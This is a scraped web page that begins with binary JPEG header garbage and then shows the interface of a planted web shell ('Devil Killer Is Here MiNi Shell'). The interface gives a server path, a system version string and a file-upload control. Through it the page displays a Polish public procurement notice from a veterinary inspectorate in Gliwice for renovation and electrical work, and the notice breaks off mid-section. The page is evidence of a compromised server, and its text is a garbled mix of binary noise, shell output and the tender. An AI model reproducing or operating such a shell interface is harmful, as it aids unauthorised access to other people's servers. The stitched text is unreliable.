JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241009/0053904501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Prace remontowe dotyczące rampy, elewacji, wybranych wejść i pomieszczeń biurowych, wraz z wymianą drzwi, montażem klimatyzatorów oraz remontem części instalacji, itp.- części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY INSPEKTORAT WETERYNARII W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276285632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ku Dołom 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 231 23 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gliwice.piw@wetgiw.gov.pl.</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piw-gliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace remontowe dotyczące rampy, elewacji, wybranych wejść i pomieszczeń biurowych, wraz z wymianą drzwi, montażem klimatyzatorów oraz remontem części instalacji, itp.- części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0b6600aa-f76e-43bd-9c1a-76c11f9ca3ef</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00539045</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00296160/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont rampy i zadaszenia nad rampą wraz z wymianą drzwi, remont pomieszczeń biurowych, montaż klimatyzatorów oraz remont tablic rozdzielczych w budynku w zarządzie trwałym PIW Gliwice, ul. Ku Dołom 6</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/995436 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 musi znajdować się w ofercie.<br/>3.	Oferta wspólna powinna być sporządzona zgodnie z SWZ.<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VI pkt 1 oraz Rozdziale VII pkt 2 g SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowalne wykonują poszczególni Wykonawcy. <br/>6.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszelkie informacje na temat RODO znajdują się na stronie internetowej Zamawiającego www.piw-gliwice.p</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RoDK/10/2024 r.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Naprawa rampy, Naprawa wejść, malowanie pomieszczeń, naprawa i malowanie elewacji:<br/>1.	W ramach niniejszej części Wykonawca zobowiązuje się do:<br/>a) remontu wejścia technicznego do budynku od strony południowej zgodnie z opisem zawartym w części technicznej oraz rysunkiem A.12.<br/>b)	remontu wejścia do budynku od strony północnej zgodnie z opisem zawartym w części technicznej oraz rysunkiem A.13.<br/>c) remontu wejścia do budynku od strony zachodniej zgodnie z opisem zawartym w części technicznej oraz rysunkiem A.14.<br/>d)	Wykonanie nakładek na parapety w pomieszczeniach zgodnie z rysunkiem A.15. i opisem technicznym, wymiana do piwnicy na klatce schodowej parteru, korekta drzwi wejściowych do budynku, montaż nowych nawiewników okiennych w kolorze białym. Uwaga przy tej części zamawiający nie wymaga montażu klimatyzatorów, gdyż montaż klimatyzatorów znajduje się w części opracowania poświęconej instalacji klimatyzacji – opis oraz rysunki PT-IKL-01 (INSTALACJA KLIMATYZACJI – RZUT PIWNICY I PARTERU); PT-IKL-02 (INSTALACJA KLIMATYZACJI – RZUT PIĘTRA).<br/>e)	Demontaż starych, zniszczonych koryt kablowych, wykonanie nakładek na parapety, wymiana osprzętu elektrycznego, naprawa tynków, otwory wentylacyjne w sanitariatach, wymiana drzwi do pomieszczenia nr 15, demontaż i montaż nowych drzwi o szerokości przejścia – 2 szt i 1 szt. drewniana, zamiana grzejników pomiędzy pomieszczeniami 6 i 7, montaż nawiewników – zgodnie z rysunkiem nr A.17 oraz opisem technicznym.<br/>f)	Malowanie pomieszczeń<br/>UWAGA WAŻNE: W przypadku składania ofert dla I, II, III części konieczne jest odbycie wizji lokalnej. Termin wykonania wizji lokalnej to 11 października 2024 r. (piątek) od godziny 9:00 do godziny 11:00. W przypadku nie odbycia wizji lokalnej Zamawiający odrzuci ofertę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1	Cena <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie: <br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>2	Okres gwarancji jakości na wykonane roboty budowlane w miesiącach<br/>Waga 10.00 %<br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 36 miesięcy termin gwarancji Wykonawca otrzyma – 1 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 48 miesięcy termin gwarancji Wykonawca otrzyma –5 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 60 miesięcy termin gwarancji Wykonawca otrzyma – 10 pkt. <br/>3	Skrócenie terminu wykonania zamówienia <br/>Liczba punktów = (Tof/Tmax) * 100 * 30<br/><br/>gdzie:<br/>Tof - liczba dni powodująca skrócenie terminu wskazana w ofercie.<br/>Tmax - największa liczba dni powodująca skrócenie terminu wykonania zamówienia spośród wszystkich ofert<br/><br/>Minimalny termin wykonania zamówienia to 25 dni od daty podpisania umowy, maksymalny termin wykonania zamówienia to 45 dni od daty podpisania umowy. Wykonawca maksymalnie może skrócić termin wykonania zamówienia o 20 dni kalendarzowych. Należy wskazać konkretną liczbę dni skrócenia terminu wykonania zamówienia np. o 5 dni.<br/>W przypadku nie wskazania przez Wykonawcę skrócenia terminu o daną liczbę dni kalendarzowych, Zamawiający będzie oceniał ofertę tak, jakby Wykonawca wskazał 0 dni kalendarzowych, z terminem realizacji 45 dni od daty podpisania umowy. <br/>Termin realizacji zamówienia określony przez Zamawiającego ( 45 dni od podpisania umowy jest terminem maksymalnym niezbędnym do oceny oferty).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	W ramach niniejszej części Wykonawca zobowiązuje się do:<br/>a)	Dostawy klimatyzatorów – szt 5 typu split z inwerterem.<br/>b)	Wykonanie instalacji oraz montaż klimatyzatorów, klimatyzatory muszą być zgodne z opisem, kompletne,<br/>c)	Próbę techniczną i odbiór końcowy, działających klimatyzatorów.<br/>d)	Doprowadzenie do pierwotnego wyglądu miejsca instalacji klimatyzacji. <br/>Szczegółowy opis znajduje się w dokumentach:<br/>- STWiOR – instalacja klimatyzacji </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1	Cena <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie: <br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>2	Okres gwarancji jakości na wykonane roboty budowlane w miesiącach<br/>Waga 10.00 %<br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 36 miesięcy termin gwarancji Wykonawca otrzyma – 1 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 48 miesięcy termin gwarancji Wykonawca otrzyma –5 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – w przypadku zaoferowania 60 miesięcy termin gwarancji Wykonawca otrzyma – 10 pkt. <br/> <br/>3	Skrócenie terminu wykonania zamówienia <br/>Liczba punktów = (Tof/Tmax) * 100 * 30<br/><br/>gdzie:<br/>Tof - liczba dni powodująca skrócenie terminu wskazana w ofercie.<br/>Tmax - największa liczba dni powodująca skrócenie terminu wykonania zamówienia spośród wszystkich ofert<br/><br/>Minimalny termin wykonania zamówienia to 10 dni od daty podpisania umowy, maksymalny termin wykonania zamówienia to 45 dni od daty podpisania umowy. Wykonawca maksymalnie może skrócić termin wykonania zamówienia o 35 dni kalendarzowych. Należy wskazać konkretną liczbę dni skrócenia terminu wykonania zamówienia np. o 5 dni.<br/>W przypadku nie wskazania przez Wykonawcę skrócenia terminu o daną liczbę dni kalendarzowych, Zamawiający będzie oceniał ofertę tak, jakby Wykonawca wskazał 0 dni kalendarzowych, z terminem realizacji 45 dni od daty podpisania umowy. <br/>Termin realizacji zamówienia określony przez Zamawiającego ( 45 dni od podpisania umowy jest terminem maksymalnym niezbędnym do oceny oferty).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach niniejszej części Wykonawca zobowiązuje się do:<br/>a)	Wykona rozdział przewodu PEN na PE i N,<br/>b)	Wymiana rozdzielnicy RG,<br/>c)	W rozdzielnicy RLE zabudować rozłącznik bezpiecznikowy i inne instalacje elektryczne opisane w opisie technicznym zamierzenia budowlanego – egzemplarz nr 3.<br/>d)	Wewnętrzną linie zasilająca rozdzielnicę TBO.<br/>e)	Rozdzielnie energii elektrycznej w rozdzielnicy RG<br/>f)	Rozprowadzenie instalacji elektrycznych<br/>g)	Ochrony przed porażeniem i przepięciem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31213100-3 - Rozdzielnie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1	Cena <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie: <br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>2	Okres gwarancji jakości na wykonane roboty budowlane w miesiącach<br/>Waga 10.00 %<br/>minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – <br/>w przypadku zaoferowania 36 miesięcy termin gwarancji Wykonawca otrzyma – 1 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – <br/>w przypadku zaoferowania 48 miesięcy termin gwarancji Wykonawca otrzyma –5 pkt. <br/>- minimalny termin gwarancji 36 miesięcy od podpisania protokołu zdawczo – odbiorczego – <br/>w przypadku zaoferowania 60 miesięcy termin gwarancji Wykonawca otrzyma – 10 pkt. <br/><br/>3	Skrócenie terminu wykonania zamówienia <br/>Liczba punktów = (Tof/Tmax) * 100 * 30<br/><br/>gdzie:<br/>Tof - liczba dni powodująca skrócenie terminu wskazana w ofercie.<br/>Tmax - największa liczba dni powodująca skrócenie terminu wykonania zamówienia spośród wszystkich ofert<br/><br/>Minimalny termin wykonania zamówienia to 25 dni od daty podpisania umowy, maksymalny termin wykonania zamówienia to 45 dni od daty podpisania umowy. Wykonawca maksymalnie może skrócić termin wykonania zamówienia o 20 dni kalendarzowych. Należy wskazać konkretną liczbę dni skrócenia terminu wykonania zamówienia np. o 5 dni.<br/>W przypadku nie wskazania przez Wykonawcę skrócenia terminu o daną liczbę dni kalendarzowych, Zamawiający będzie oceniał ofertę tak, jakby Wykonawca wskazał 0 dni kalendarzowych, z terminem realizacji 45 dni od daty podpisania umowy. <br/>Termin realizacji zamówienia określony przez Zamawiającego ( 45 dni od podpisania umowy jest terminem maksymalnym niezbędnym do oceny oferty).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skróćenie terminu realziacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> II.	Ponadto, o udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej określone warunki udziału w postępowaniu 